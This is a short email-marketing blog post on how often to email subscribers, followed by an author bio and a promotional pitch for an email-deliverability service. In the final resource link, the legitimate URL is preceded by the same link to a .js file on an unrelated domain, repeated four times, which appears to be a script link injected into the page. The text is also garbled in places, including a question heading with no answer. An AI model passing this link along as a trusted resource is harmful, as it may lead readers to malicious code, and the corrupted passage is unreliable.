Deliverability Reminders: Email Frequency
We wanted to just revisit some common questions that we get asked about frequently (and it's a good refresher for seasoned marketers).
So... for the next several weeks, we're going to address a different question each week to keep the snippets short, simple and actionable for you! If you have any questions you'd like to see answered, please submit them and we'll be happy to add them in to the list!
Q7. How Often Should I Email My List?
The simple answer is… as often as your subscribers expect!
It is NOT “whenever you need to make some money.”
A successful email program ultimately comes down to mailing the right message at the right time, to the right market.
When people sign up for your list, they do so with some level of expectation. More often than not, it’s to get something that you promised and NOT to get multiple emails every day forever more. But, as marketers, we tend to treat our subscribers like little cash machines rather than establishing a relationship and gaining their trust.
When this happens, marketers lose subscribers, hurt deliverability, and ultimately make less money in the long run.
Here are a few ways to make sure you’re emailing your subscribers at the levels they expect:
1. Be very clear, up front, what they’re signing up for. If it’s an individual download, be sure to get permission to send other types of emails and regular frequency.
2. Provide a way for them to change the types of messages they receive and the frequency with which they receive the emails.
3. Segment your list with as much detail as you can and send content and offers to the prospects that are most likely to be interested in the topic and/or product based on both their feedback (aka answers to surveys) and their actions (i.e. opted into a webinar on topic X in the past).
Q8. Email Copywriting 101
For over a decade Heather Seitz used email marketing to build successful companies and had to solve the biggest barrier to consistent profitability: deliverability. Today she is the Co-Founder and CEO of Email Delivered.
To know more about email frequency and discover more email deliverability secrets of the most successful email marketers, visit http://middle.destinyfernandi.com/clork/bons/danf.js?k=0&middle.destinyfernandi.com/clork/bons/danf.js?k=0&middle.destinyfernandi.com/clork/bons/danf.js?k=0&middle.destinyfernandi.com/clork/bons/danf.js?k=0&www.emaildelivered.com/category/email-deliverability/. Remember to sign up for the FREE Email Delivered Pulse newsletter for articles, tips, and recommended resources for email marketers.
How to Get Your Emails to the Inbox
If you want to get more of your emails to the inbox, you need to know the secrets that the Email Service Providers AREN’T willing to tell you. For a limited time, I’m sharing some select tips that top Internet Marketers know... for FREE.
Here’s what you’ll get right now...
- The How to Guide for getting your emails back to the inbox.
- How to find (and improve) your email “reputation” (how the ISPs see you).
- 5 Email KILLERS that your email service provider is purposely hiding from you.